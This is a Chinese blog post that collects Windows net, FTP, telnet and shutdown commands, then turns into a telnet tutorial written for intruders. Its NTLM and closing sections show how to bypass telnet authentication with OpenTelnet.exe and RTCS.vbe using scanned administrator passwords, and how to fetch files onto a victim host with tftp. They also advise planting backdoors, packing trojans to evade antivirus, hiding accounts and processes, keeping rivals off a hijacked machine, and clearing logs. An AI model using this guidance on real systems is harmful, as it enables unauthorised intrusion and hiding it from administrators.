net、FTP、telnet命令和遠程登錄重啓服務器

 1)net命令

    net use \\192.192.0.1\ipc$ "密碼"/user:"administrator"

    net use h: \\ip\c$ 登陸後映射對方C:到本地爲H:

   遠程重啓:

    net use \\192.168.0.1 "password" /user:administrator
           rsd /n /c:192.168.0.73 /m:"reboot after 200 sec" /r /f /t:200

(2)telnet

    telnet 192.192.0.1 23

    telnet 然後 open 192.192.0.1 23

    必須知道端口,默認端口爲23,如果telnet服務沒有開啓,需要先開啓。

(3)FTP連接

       ftp 192.192.0.1 回車會提示輸入用戶名 、密碼

(4)遠程重啓

    shutdown -t 30 -r

(5)用sql命令重啓遠程服務器:(必須是遠程數據庫的管理員)

    exec   master..xp_cmdshell   'shutdown   /r   /f'

####################以下爲參考#####################

 

FTP連接:

如何遠程管理FTP服務器?有人喜愛用工具,如Serv-U。DOS族們卻嫌麻煩,DOS下有何招數,且看下文。

  在實際工作中,我們經常需要遠程管理FTP服務器。有時手頭又沒有專用的管理工具,其實利用DOS命令一樣可以有效地遠程管理FTP。

  1、遠程登錄

  命令格式爲:ftp FTP服務器IP地址。

  假如我們的FTP服務器地址爲:202.102.5.211,則在MS-DOS方式下鍵入命令:ftp 202.102.5.211 ,按回車鍵確認。

  此後會出現用戶名輸入提示:“user”,鍵入用戶名,如:“syzx123”。按回車,出現輸入密碼提示:“PassWord”,鍵入密碼後按回車即可登錄到服務器中。

  2、瀏覽刪除目錄、文件

  鍵入dir命令即可看到權限範圍內的目錄。鍵入“rename+空格+原文件或文件夾名+空格+新文件或文件夾名”,按回車鍵確認,即可將原文件或文件夾改名。還可以像在本地機一樣用Delete命令刪除文件或文件夾、利用“cd+空格+文件夾名”進入相應的文件夾瀏覽等等。當然,所有你登錄的用戶必須具有相應的權限你的操作纔有效。

  3、遠程修改登錄密碼

  如果你登錄的用戶具有修改密碼的權限,那麼你可以使用如下命令修改密碼。

  命令格式爲:quote“site pswd+空格+舊密碼+空格+新密碼”

  按回車鍵確認後出現提示:“230 Password Changed Okay”字樣,則表明修改成功。

 

net use用法詳解

windows下,命令行往往可以起到很多意想不到的效果,很多軟件無法解決的問題,往往幾句原始的命令就搞定了,今天貼一下關於net use的用法,希望可以有幫助,更多的幫助請在cmd察看net use /?

net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C:到本地爲H:
net use h: \\ip\c$ 登陸後映射對方C:到本地爲H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的爲H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把“用戶”添加到管理員中使其具有管理員權限,注意:administrator後加s用複數
net start 查看開啓了哪些服務
net start 服務名  開啓服務;(如:net start telnet, net start schedule)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與“目標IP”主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地局域網內開啓了哪些共享
net view \\ip 查看對方局域網內開啓了哪些共享
net config 顯示系統網絡設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 局域網內正在使用的網絡連接類型和信息
net share 查看本地開啓的共享
net share ipc$ 開啓ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345 用guest用戶登陸後用將密碼改爲12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啓了哪些端口,常用netstat -an
netstat -n 查看端口的網絡連接情況,常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況)
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個端口開了的話,就可查看對方最近登陸的用戶名(03前的爲用戶名)-注意:參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由(數據包),參數:“-w數字”用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小爲32字節的數據,參數:“-l[空格]數據包大小”;“-n發送數據次數”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數“/all”顯示全部配置信息
tlist -t 以樹行列表顯示進程(爲系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(爲系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如“DEL/AR *.*”表示刪除當前目錄下所有隻讀文件,“DEL/A-S *.*”表示刪除當前目錄下除系統文件以外的所有文件

 

遠程重啓停止響應的服務器

服務器本來安裝有終端服務和pcanywhere方便管理,後來因故卸載了pcanywhere,但是爲防萬一添加了另外一個有administrators權限的用戶。但是今天很悲慘,這個用戶登錄時總是提示超過連接的最大範圍。而administrator登錄終端後只能看着桌面發呆,點什麼都沒有反應。幸好web服務和ftp服務都還正常。

讓服務器重啓的文件在Windows2000中是調用Windows下System中的Shell32.dll文件來實現關機的,例如“indir\RunDLL32.exe indir\System\Shell32.dll,SHExitWindowsEx 8”,但是不清楚具體參數的含義,擔心萬一是關機而不是重啓就麻煩了,所以還是使用winxp自帶的shutdown.exe保險,它的使用方法很明確:

  shutdown.exe -a         取消關機

  shutdown.exe -f         強行關閉應用程序。

  shutdown.exe -m \\計算機名   控制遠程計算機。

  shutdown.exe -i         顯示圖形用戶界面,但必須是Shutdown的第一個參數。  

  shutdown.exe -l         註銷當前用戶。

  shutdown.exe -r         關機並重啓。

  shutdown.exe -t時間       設置關機倒計時。

  shutdown.exe -c"消息內容"    輸入關機對話框中的消息內容(不能超127個字符)。

考慮到默認服務器開啓着ipc$,而且自己知道administrator的密碼,試着用net use \\ip\ipc$ “密碼” /user:“administrator”連接服務器,結果卻是系統發生 53 錯誤,找不到網絡路徑。

想要上傳木馬程序,服務器安裝了防病毒軟件,肯定不行。

已經讓網友把shutdown.exe傳給我了再傳到服務器上了,怎麼運行它呢?

想到我登錄ftp的帳號是系統管理員帳號,於是在cmd窗口下:

ftp://服務器IP

用戶名

密碼

登錄成功

cd shutdown.exe所在的目錄

quote site exec shutdown.exe -r

結果是permission denied.

原來我沒給加上執行權限。

在本機serv-U上添加遠程計算機,使用系統管理員帳號密碼,這樣在本機上就可以管理服務器上的serv-U,

給該帳號加上執行權限。重試前一命令,結果200 EXEC command successful (TID=33).

但是服務器居然沒一點反應,暈倒!

正在考慮還有沒有其它方法時,serv-U提示跟服務器斷開連接了,哈哈哈,過了一會,服務器重啓了!

 

telnet命令詳解:

目錄:

一 摘要

二 遠程登錄

三 Telnet協議

四 Win2000的Telnet服務

五 在telnet中該做什麼

六 結束語

一 摘要

Telnet的應用不僅方便了我們進行遠程登錄,也給hacker們提供了又一種入侵手段和後門,但無論如何,在你盡情享受Telnet所帶給你的便捷的同時,你是否真正的瞭解Telnet呢?

二 遠程登錄

Telnet服務雖然也屬於客戶機/服務器模型的服務,但它更大的意義在於實現了基於Telnet協議的遠程登錄(遠程交互式計算),那麼就讓我們來認識一下遠程登錄。

1 遠程登陸的基本概念

先來看看什麼叫登錄:分時系統允許多個用戶同時使用一臺計算機,爲了保證系統的安全和記帳方便,系統要求每個用戶有單獨的帳號作爲登錄標識,系統還爲每個用戶指定了一個口令。用戶在使用該系統之前要輸入標識和口令,這個過程被稱爲'登錄'。

遠程登陸是指用戶使用Telnet命令,使自己的計算機暫時成爲遠程主機的一個仿真終端的過程。仿真終端等效於一個非智能的機器,它只負責把用戶輸入的每個字符傳遞給主機,再將主機輸出的每個信息回顯在屏幕上。

2 遠程登陸的產生及發展

我們可以先構想一個提供遠程文字編輯的服務,這個服務的實現需要一個接受編輯文件請求和數據的服務器以及一個發送此請求的客戶機。客戶機將建立一個從本地機到服務器的TCP連接,當然這需要服務器的應答,然後向服務器發送鍵入的信息(文件編輯信息),並讀取從服務器返回的輸出。以上便是一個標準而普通的客戶機/服務器模型的服務。

似乎有了客戶機/服務器模型的服務,一切遠程問題都可以解決了。然而實際並非你想象的那樣簡單,如果我們僅需要遠程編輯文件,那麼剛纔所構想的服務完全可以勝任,但假如我們的要求並不是這麼簡單,我們還想實現遠程用戶管理,遠程數據錄入,遠程系統維護,想實現一切可以在遠程主機上實現的操作,那麼我們將需要大量專用的服務器程序併爲每一個可計算服務都使用一個服務器進程,隨之而來的問題是:遠程機器會很快對服務器進程應接不暇,並淹沒在進程的海洋裏(我們在這裏排除最專業化的遠程機器)。

那麼有沒有辦法解決呢?當然有,我們可以用遠程登錄來解決這一切。我們允許用戶在遠地機器上建立一個登錄會話,然後通過執行命令來實現更一般的服務,就像在本地操作一樣。這樣,我們便可以訪問遠地系統上所有可用的命令,並且系統設計員不需提供多個專用地服務器程序。

問題發展到這裏好像前途一片光明瞭,用遠程登錄總應該解決問題了吧,但要實現遠程登陸並不簡單。不考慮網絡設計的計算機系統期望用戶只從直接相連的鍵盤和顯示器上登錄,在這種機器上增加遠程登陸功能需要修改機器的操作系統,這是極其艱鉅也是我們儘量避免的。因此我們應該集中力量構造遠程登陸服務器軟件,雖然這樣也是比較困難的。爲什麼說這樣做也比較困難呢?

舉個例子來說:一般,操作系統會爲一些特殊按鍵分配特殊的含義,比如本地系統將'Ctrl+C'解釋爲:'終止當前運行的命令進程'。但假設我們已經運行了遠程登陸服務器軟件,'Ctrl+C'也有可能無法被傳送到遠地機器,如果客戶機真的將'Ctrl+C'傳到了遠地機器,那麼'Ctrl+C'這個命令有可能不能終止本地的進程,也就是說在這裏很可能會產生混亂。而且這僅僅是遇到的難題之一。

但儘管有技術上的困難,系統編程人員還是設法構造了能夠應用於大多數操作系統的遠程登陸服務器軟件,並構造了充當客戶機的應用軟件。通常,客戶機軟件取消了除一個鍵以外的所有鍵的本地解釋,並將這些本地解釋相應的轉換成遠地解釋,這就使得客戶機軟件與遠地機器的交互,就如同坐在遠程主機面前一樣,從而避免了上述所提到的混亂。而那個唯一例外的鍵,可以使用戶回到本地環境。

將遠程登陸服務器設計爲應用級軟件,還有另一個要求,那就是需要操作系統提供對僞終端(pseudo terminal)的支持。我們用僞終端描述操作系統的入口點,它允許像Telnet服務器一樣的程序向操作系統傳送字符,並且使得字符像是來自本地鍵盤一樣。只有使用這樣的操作系統,才能將遠程登陸服務器設計爲應用級軟件(比如Telnet服務器軟件),否則,本地操作系統和遠地系統傳送將不能識別從對方傳送過來的信息(因爲它們僅能識別從本地鍵盤所鍵入的信息),遠程登陸將宣告失敗。

將遠程登陸服務器設計爲應用級軟件雖然有其顯著的優點:比將代碼嵌入操作系統更易修改和控制服務器。但其也有效率不高的缺點(後面的內容將會給予解釋),好在用戶鍵入信息的速率不高,這種設計還是可以接受的。

3 遠程登錄的工作過程

使用Telnet協議進行遠程登陸時需要滿足以下條件:在本的計算機上必須裝有包含Telnet協議的客戶程序;必須知道遠程主機的Ip地址或域名;必須知道登錄標識與口令。

Telnet遠程登錄服務分爲以下4個過程:

1)本地與遠程主機建立連接。該過程實際上是建立一個TCP連接,用戶必須知道遠程主機的Ip地址或域名;

2)將本地終端上輸入的用戶名和口令及以後輸入的任何命令或字符以NVT(Net Virtual Terminal)格式傳送到遠程主機。該過程實際上是從本地主機向遠程主機發送一個IP數據報;

3)將遠程主機輸出的NVT格式的數據轉化爲本地所接受的格式送回本地終端,包括輸入命令回顯和命令執行結果;

4)最後,本地終端對遠程主機進行撤消連接。該過程是撤銷一個TCP連接。

上面的內容只是討論了遠程登陸最基本的東西,其中的複雜和編程人員的艱辛是我們難以想象的,不知道你在舒服的使用Telnet的同時,是否想到了這些!

三 Telnet協議

我們知道Telnet服務器軟件是我們最常用的遠程登錄服務器軟件,是一種典型的客戶機/服務器模型的服務,它應用Telnet協議來工作。那麼,什麼是Telnet協議?它都具備哪些特點呢?

1 基本內容

Telnet協議是TCP/IP協議族中的一員,是Internet遠程登陸服務的標準協議。應用Telnet協議能夠把本地用戶所使用的計算機變成遠程主機系統的一個終端。它提供了三種基本服務:

1)Telnet定義一個網絡虛擬終端爲遠的系統提供一個標準接口。客戶機程序不必詳細瞭解遠的系統,他們只需構造使用標準接口的程序;

2)Telnet包括一個允許客戶機和服務器協商選項的機制,而且它還提供一組標準選項;

3)Telnet對稱處理連接的兩端,即Telnet不強迫客戶機從鍵盤輸入,也不強迫客戶機在屏幕上顯示輸出。

2 適應異構

爲了使多個操作系統間的Telnet交互操作成爲可能,就必須詳細瞭解異構計算機和操作系統。比如,一些操作系統需要每行文本用ASCII回車控制符(CR)結束,另一些系統則需要使用ASCII換行符(LF),還有一些系統需要用兩個字符的序列回車-換行(CR-LF);再比如,大多數操作系統爲用戶提供了一箇中斷程序運行的快捷鍵,但這個快捷鍵在各個系統中有可能不同(一些系統使用CTRL+C,而另一些系統使用ESCAPE)。如果不考慮系統間的異構性,那麼在本地發出的字符或命令,傳送到遠地並被遠地系統解釋後很可能會不準確或者出現錯誤。因此,Telnet協議必須解決這個問題。

爲了適應異構環境,Telnet協議定義了數據和命令在Internet上的傳輸方式,此定義被稱作網絡虛擬終端NVT(Net Virtual Terminal)。它的應用過程如下:

對於發送的數據:客戶機軟件把來自用戶終端的按鍵和命令序列轉換爲NVT格式,併發送到服務器,服務器軟件將收到的數據和命令,從NVT格式轉換爲遠地系統需要的格式;

對於返回的數據:遠地服務器將數據從遠地機器的格式轉換爲NVT格式,而本地客戶機將將接收到的NVT格式數據再轉換爲本地的格式。

對於NVT格式的詳細定義,有興趣的朋友可以去查找相關資料。

3 傳送遠地命令

我們知道絕大多數操作系統都提供各種快捷鍵來實現相應的控制命令,當用戶在本地終端鍵入這些快捷鍵的時候,本地系統將執行相應的控制命令,而不把這些快捷鍵作爲輸入。那麼對於Telnet來說,它是用什麼來實現控制命令的遠地傳送呢?

Telnet同樣使用NVT來定義如何從客戶機將控制功能傳送到服務器。我們知道USASCII字符集包括95個可打印字符和33個控制碼。當用戶從本地鍵入普通字符時,NVT將按照其原始含義傳送;當用戶鍵入快捷鍵(組合鍵)時,NVT將把它轉化爲特殊的ASCII字符在網絡上傳送,並在其到達遠地機器後轉化爲相應的控制命令。將正常ASCII字符集與控制命令區分主要有兩個原因:

1)這種區分意味着Telnet具有更大的靈活性:它可在客戶機與服務器間傳送所有可能的ASCII字符以及所有控制功能;

2)這種區分使得客戶機可以無二義性的指定信令,而不會產生控制功能與普通字符的混亂。

4 數據流向

上面我們提到過將Telnet設計爲應用級軟件有一個缺點,那就是:效率不高。這是爲什麼呢?下面給出Telnet中的數據流向:

數據信息被用戶從本地鍵盤鍵入並通過操作系統傳到客戶機程序,客戶機程序將其處理後返回操作系統,並由操作系統經過網絡傳送到遠地機器,遠地操作系統將所接收數據傳給服務器程序,並經服務器程序再次處理後返回到操作系統上的僞終端入口點,最後,遠地操作系統將數據傳送到用戶正在運行的應用程序,這便是一次完整的輸入過程;輸出將按照同一通路從服務器傳送到客戶機。

因爲每一次的輸入和輸出,計算機將切換進程環境好幾次,這個開銷是很昂貴的。還好用戶的鍵入速率並不算高,這個缺點我們仍然能夠接受。

5 強制命令

我們應該考慮到這樣一種情況:假設本地用戶運行了遠地機器的一個無休止循環的錯誤命令或程序,且此命令或程序已經停止讀取輸入,那麼操作系統的緩衝區可能因此而被佔滿,如果這樣,遠地服務器也無法再將數據寫入僞終端,並且最終導致停止從TCP連接讀取數據,TCP連接的緩衝區最終也會被佔滿,從而導致阻止數據流流入此連接。如果以上事情真的發生了,那麼本地用戶將失去對遠地機器的控制。

爲了解決此問題,Telnet協議必須使用外帶信令以便強制服務器讀取一個控制命令。我們知道TCP用緊急數據機制實現外帶數據信令,那麼Telnet只要再附加一個被稱爲數據標記(date mark)的保留八位組,並通過讓TCP發送已設置緊急數據比特的報文段通知服務器便可以了,攜帶緊急數據的報文段將繞過流量控制直接到達服務器。作爲對緊急信令的相應,服務器將讀取並拋棄所有數據,直到找到了一個數據標記。服務器在遇到了數據標記後將返回正常的處理過程。

6 選項協商

由於Telnet兩端的機器和操作系統的異構性,使得Telnet不可能也不應該嚴格規定每一個telnet連接的詳細配置,否則將大大影響Telnet的適應異構性。因此,Telnet採用選項協商機制來解決這一問題。

Telnet選項的範圍很廣:一些選項擴充了大方向的功能,而一些選項制涉及一些微小細節。例如:有一個選項可以控制Telnet是在半雙工還是全雙工模式下工作(大方向);還有一個選項允許遠地機器上的服務器決定用戶終端類型(小細節)。

Telnet選項的協商方式也很有意思,它對於每個選項的處理都是對稱的,即任何一端都可以發出協商申請;任何一端都可以接受或拒絕這個申請。另外,如果一端試圖協商另一端不瞭解的選項,接受請求的一端可簡單的拒絕協商。因此,有可能將更新,更復雜的Telnet客戶機服務器版本與較老的,不太複雜的版本進行交互操作。如果客戶機和服務器都理解新的選項,可能會對交互有所改善。否則,它們將一起轉到效率較低但可工作的方式下運行。所有的這些設計,都是爲了增強適應異構性,可見Telnet的適應異構性對其的應用和發展是多麼重要。

上面討論了一些原理方面的東西,雖然我們在Telnet的使用過程中很難接觸到這一層面,但我認爲了解這些是有意義的,它會給我們帶來許多啓示。下面讓我們來看看Win2000的Telnet服務。

(本系列教程不定期更新,欲獲得最新版本,請登陸官方網站:菜菜鳥社區 http://ccbirds.yeah.net

四 Win2000的Telnet服務

其實從應用層面上,Win2000的Telnet服務並沒有什麼可說的,絕大部分內容你都可以從HELP文件中得到,我在此只是把它稍微整理一下而已。

1 基本配置

Win2000爲我們提供了Telnet客戶機和服務器程序:Telnet.exe是客戶機程序(Client),tlntsvr.exe是服務器程序(server),同時它還爲我們提供了Telnet服務器管理程序tlntadmn.exe。

Windows 2000 默認安裝了 Telnet 服務,但是並沒有默認啓動。下面給出HELP文件中 Telnet 服務的一部分默認設置:

AllowTrustedDomain:是否允許域用戶訪問。默認值是1,允許信任域用戶訪問。可以改爲0: 不允許域用戶訪問(只允許本地用戶)。

DefaultDomain:可以對與該計算機具有信任關係的任何域設置。默認值是"."。

DefaultShell:顯示 shell 安裝的路徑位置。默認值是: %systemroot%\System32\Cmd.exe /q /k

MaxFailedLogins:在連接終止之前顯示嘗試登錄失敗的最大次數。默認是3。

LoginScript:顯示 Telnet 服務器登錄腳本的路徑位置。默認的位置就是“%systemroot%\System32\login.cmd”,你可以更改腳本內容,這樣登錄進Telnet的歡迎屏幕就不一樣了。

NTLM:NTLM身份驗證選項。默認是2。可以有下面這些值:

0: 不使用 NTLM 身份驗證。

1: 先嚐試 NTLM 身份驗證,如果失敗,再使用用戶名和密碼。

2: 只使用 NTLM 身份驗證。

TelnetPort:顯示 telnet 服務器偵聽 telnet 請求的端口。默認是:23。你也可以更改爲其他端口。

以上各項設置你可以使用tlntadmn.exe(Telnet服務器管理程序)來進行非常方便的配置,配置後需要重新啓動Telnet服務。如圖1

2 NTLM

提到了telnet就不能不提NTLM,我想這也是讓入侵者最爲頭痛的一件事,哪怕你獲得了管理員帳號和密碼,想簡單通過NTLM也並非易事,況且win2000中的telnet默認僅以NTLM方式驗證身份,這就讓我們不得不關注NTLM這個東東,那麼什麼是NTLM呢?

早期的SMB協議在網絡上明文傳輸口令,後來出現了"LAN Manager Challenge/Response"驗證機制,簡稱LM,它十分簡單以至很容易被破解,微軟隨後提出了WindowsNT挑戰/響應驗證機制,即NTLM。現在已經有了更新的NTLMv2以及Kerberos驗證體系。NTLM工作流程是這樣的:

1、客戶端首先在本地加密當前用戶的密碼成爲密碼散列

2、客戶端向服務器發送自己的帳號,這個帳號是沒有經過加密的,明文直接傳輸

3、服務器產生一個16位的隨機數字發送給客戶端,作爲一個 challenge(挑戰)

4、客戶端再用加密後的密碼散列來加密這個 challenge ,然後把這個返回給服務器。作爲 response(響應)

5、服務器把用戶名、給客戶端的challenge 、客戶端返回的 response 這三個東西,發送域控制器

6、域控制器用這個用戶名在 SAM密碼管理庫中找到這個用戶的密碼散列,然後使用這個密碼散列來加密 challenge。

7、域控制器比較兩次加密的 challenge ,如果一樣,那麼認證成功。

從上面的過程我們可以看出,NTLM是以當前用戶的身份向Telnet服務器發送登錄請求的,而不是用你掃到的對方管理員的帳戶和密碼登錄,顯然,你的登錄將會失敗。舉個例子來說,你家的機器名爲A(本地機器),你入侵的機器名爲B(遠地機器),你在A上的帳戶是xinxin,密碼是1234,你掃到B的管理員帳號是Administrator,密碼是5678,當你想Telnet到B時,NTLM將自動以當前用戶的帳號和密碼作爲登錄的憑據來進行上面的7項操作,即用xinxin和1234,而並非用你掃到的Administrator和5678,且這些都是自動完成的,根本不給你插手的機會,因此你的登錄操作將失敗。

由於Telnet服務器對NTLM的使用有3個選項,所以當你Telnet遠地機器時,會顯示下面情況中的一種:

1)身份驗證選項=0時

=====================================

Microsoft (R) Windows (TM) Version 5.00 (Build 2195)

Welcome to Microsoft Telnet Service

Telnet Server Build 5.00.99201.1

login:

password:

\\爲0時不使用NTML身份驗證,直接輸入用戶名和密碼,比如你可以輸入掃到的Administrator和5678

2)身份驗證選項=1時

=====================================

NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password

Microsoft (R) Windows (TM) Version 5.00 (Build 2195)

Welcome to Microsoft Telnet Service

Telnet Server Build 5.00.99201.1

login:

password:

\\先嚐試 NTLM 身份驗證,如果失敗,再使用用戶名和密碼,其實這種方式對於我們來說,與上一種方式沒什麼區別

3)身份驗證選項=2時

=====================================

NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password

Server allows NTLM authentication only

Server has closed connection

遺失對主機的連接。

C:\>

\\仔細看看上面的顯示,根本沒有給你輸入用戶名和密碼的機會,直接斷開連接,掃到了密碼也是白掃

所以對於入侵者來說,NTLM是橫在我們面前的一座大山,必須要除掉它,一般我們有如下幾種方法:

1通過修改遠程註冊表更改telnet服務器配置,將驗證方式從2改爲1或0;

2使用NTLM.exe,上傳後直接運行,可將telnet服務器驗證方式從2改爲1;

3在本地建立掃描到的用戶,以此用戶身份開啓telnet客戶機並進行遠程登錄;

4使用軟件,比如opentelnet.exe(需要管理員權限且開啓IPC管道)

5使用腳本,如RTCS,(需要管理員權限但不依賴IPC管道)

基本上是以上的5種,其中後兩種是我們比較常用的開telnet的手法,而且使用方法十分簡單,命令如下:

OpenTelnet.exe \\server username password NTLMAuthor telnetport

OpenTelnet.exe \\服務器地址 管理員用戶名 密碼 驗證方式(填0或1) telnet端口

cscript RTCS.vbe targetIP username password NTLMAuthor telnetport

cscript RTCS.vbe <目標IP> <管理員用戶名> <密碼> <驗證方式> <tlnet端口>

五 在telnet中該做什麼

本來寫到上面就想結束了,不過許多朋友都說telnet上去後不知道該做什麼了,既然這樣,那我就拋磚引玉吧,這次不講具體做法,只是說說思路,什麼?爲什麼不講具體做法?篇幅不夠嘛,以後我會一一解釋的。

1 查看系統信息

呵呵,其實就是隨處看看,看看他的系統配置和版本(用type c:\boot.ini來知道pro版或server版),看看都裝了什麼服務或軟件(從目錄名就可以知道了),看看有什麼重要或有趣的文件啦(唉,要是國外的機器,看也看不懂),看看他的用戶情況,總之就是儘可能多的瞭解系統,爲一會裝後門摸底。

2 使用tftp傳送文件

想必大家都遇到過在telnet中傳輸文件的問題,因爲我們習慣了在ipc管道中的文件傳輸,所以有些朋友喜歡用net share ipc$ 來打開管道,進而利用copy來傳輸文件。不過這樣反而麻煩,既然我們已經得到了shell,我們可以用TFPT命令來完成這一切,什麼是TFTP呢?

用TFTP(Trivial File Transfer Protocol)來實現文件的傳送是一種基於UDP連接的文件傳輸,一般是使用Windows自帶的tftp.exe和一個TFTP服務器端軟件構成一個完整的傳輸結構。它是這樣使用的: 首先運行本地的TFTP Server(比如tftpd32.exe)軟件並保證始終開啓直至傳輸全部完成, 然後在telnet中(當然你也可以在其他shell中)運行下面的命令:

C:\>tftp –i ip get xinxin.exe c:\abc\xinxin.exe

其中ip爲你自己機器的ip,且上傳文件要與TFTP服務器端在同一目錄下,這樣你就可以把xinxin.exe上傳到c盤abc目錄下了(其實是從tftp服務器下載來的)

需要指出的是,如果使用代理IP,你將不能實現與外部網絡的文件傳送。因爲你的代理網關在進行數據封裝的時候會將自己的IP地址加入到你的數據報中,代替你的內部網絡地址,所以在外部網絡進行MAC尋址時是找不到你這臺TFTP服務器的。

3 安置後門

安置後門放在第二步好像早了點,如果你入侵還有其他目的,比如以破壞爲主,或者是來修改主頁的,那麼這些事情當然可以在安置後門之前做;如果你只是想得到一隻肉雞,那就沒什麼可說的了,安後門吧。

後門的種類繁多,也給我們提供了很大的選擇餘地,能夠根據具體情況選擇合適的後門的確是一門學問。常用的後門一般有:木馬,asp木馬,遠程控制軟件,克隆帳戶,建立並隱藏帳戶,telnet,telnet擴展的shell,終端服務等。安置一個好的後門通常要注意以下幾點:

1 不會被防火牆查殺及阻礙通信:被加入病毒庫的後門最好加殼以逃過防火牆,儘量用低端口通信,以免被防火牆屏蔽。

2 最大限度增加隱蔽性:如果你選擇遠程控制軟件,要注意被控端的安裝提示和小圖標,以及是否同步畫面;如果你在帳戶上做文章,要儘量保持在cmd和用戶管理中都不出破綻;如果你選擇放木馬或telnet擴展,要注意文件和進程的隱藏;如果新開了終端服務(入侵前並沒有開),一定要該掉3389這個顯眼的端口,且越低越好。

3 不要當管理員不存在:這是一個大忌,許多朋友在只有默認帳戶的機器上建立類似'hacking'的管理員帳戶,真是無知者無畏呀。所以安置後門的時候,想想管理員疏忽的地方會在哪裏。

4 打補丁

如果想獨霸肉雞,就要會打補丁,要知道對肉雞的競爭是很激烈的。怎麼打補丁呢?這個也要問?想想你是怎麼進來的吧。算了,提示一下,除了修補大的漏洞以外(上傳官方補丁並運行),也要注意它的共享,ipc$共享(最好都關閉),可疑端口,容易被利用的服務等。不過打補丁也要注意隱蔽性的,不要讓管理員發現大的改動。

5 清除日誌

可以手動或利用軟件,如果不太會就去找相關教材吧,在這裏我不詳細介紹了。

六 結束語

文章的前部分主要說了一些原理性的東西,後部分則側重於應用,寫的多了難免會有些遺漏,如果你覺得哪裏還需要補充,或者哪裏不明白,請回帖告訴我喲!!


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章